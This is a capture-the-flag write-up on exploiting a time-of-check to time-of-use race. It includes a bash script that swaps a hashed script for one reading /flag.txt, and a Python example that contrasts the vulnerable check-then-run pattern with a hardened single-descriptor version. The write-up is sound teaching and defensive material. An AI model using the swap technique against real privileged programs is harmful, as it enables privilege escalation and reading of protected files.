# Hack the Jail - Part 2

## Difficulty

Hard.

## How to solve

The key insight of this challenge is that the file is opened twice: once to check whether its MD5 sum matches the expected value, and a second time to actually execute it. This type of vulnerability is called a "time-of-check to time-of-use" (TOCTTOU) race. The challenge contains an artificially long timeout so that the race window is easy to hit.

The script below performs the actual attack:

```bash
#!/bin/bash

# run the vulnerable program in the background
./execute &

# make sure that the check has been performed
sleep 1

# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh

# wait until the "execute" program has finished
sleep 8

# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
```

The contents of the `read.sh` file are as follows:

```bash
#!/bin/bash
cat /flag.txt
```

Both files need executable permissions, which can be set with `chmod +x *.sh`.
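To make the root cause concrete, here is an added example (not part of the write-up or the challenge's own code) that reproduces the same `mv` + `cp` swap inside the check-to-use window against two versions of the checker: one that looks the path up twice, as the challenge does, and a hardened one that opens the file once, hashes the open descriptor, and executes that same descriptor. The file names, script contents and the `race` hook are constructed for this example; executing an open descriptor through `/proc/self/fd/N` assumes Linux.

```python
"""Check-then-use race: the challenge's pattern beside a hardened form.

Added illustration, not code from the write-up. Linux only: the
hardened version executes an already-open descriptor via /proc/self/fd.
"""
import hashlib
import os
import shutil
import subprocess
import tempfile


def md5_by_path(path):
    """First open: hash whatever the name points at right now."""
    with open(path, "rb") as f:
        return hashlib.md5(f.read()).hexdigest()


def md5_of_fd(fd):
    """Hash the open file description itself, not the name."""
    h = hashlib.md5()
    os.lseek(fd, 0, os.SEEK_SET)
    while True:
        chunk = os.read(fd, 65536)
        if not chunk:
            break
        h.update(chunk)
    return h.hexdigest()


def run_vulnerable(path, expected_md5, race=lambda: None):
    """Check by name, then execute by name: two lookups of ``path``."""
    if md5_by_path(path) != expected_md5:
        return None
    race()  # the window the challenge stretches with its long timeout
    return subprocess.run([path], capture_output=True, text=True).stdout


def run_hardened(path, expected_md5, race=lambda: None):
    """Open once; hash and execute the very inode behind that descriptor."""
    fd = os.open(path, os.O_RDONLY)
    try:
        if md5_of_fd(fd) != expected_md5:
            return None
        race()  # renaming or replacing ``path`` can no longer change what runs
        return subprocess.run(
            [f"/proc/self/fd/{fd}"], pass_fds=(fd,),
            capture_output=True, text=True).stdout
    finally:
        os.close(fd)


def write_script(path, message):
    """Constructed sample script that only reports which file ran."""
    with open(path, "w") as f:
        f.write(f"#!/bin/bash\necho {message}\n")
    os.chmod(path, 0o755)


def demo():
    """Run the write-up's swap (mv + cp) inside the race window against
    both versions; returns the message each one actually executed."""
    results = {}
    for name, runner in (("vulnerable", run_vulnerable),
                         ("hardened", run_hardened)):
        with tempfile.TemporaryDirectory() as d:
            target = os.path.join(d, "hello_world.sh")   # the checked file
            swapped = os.path.join(d, "read.sh")         # the replacement
            write_script(target, "approved")
            write_script(swapped, "swapped")
            expected = md5_by_path(target)

            def swap():
                os.rename(target, target + ".old")
                shutil.copy(swapped, target)  # copies the mode bits too

            results[name] = runner(target, expected, race=swap).strip()
    return results


if __name__ == "__main__":
    for version, ran in demo().items():
        print(f"{version}: executed the '{ran}' script")
```

The vulnerable runner executes the swapped script because its second lookup of the name finds the replacement; the hardened runner still executes the approved one, because the descriptor it hashed keeps referring to the original inode even after that inode has been renamed. The general rule is to never re-resolve a path between verifying a file and using it: verify and use the same open descriptor (or the same bytes already in memory).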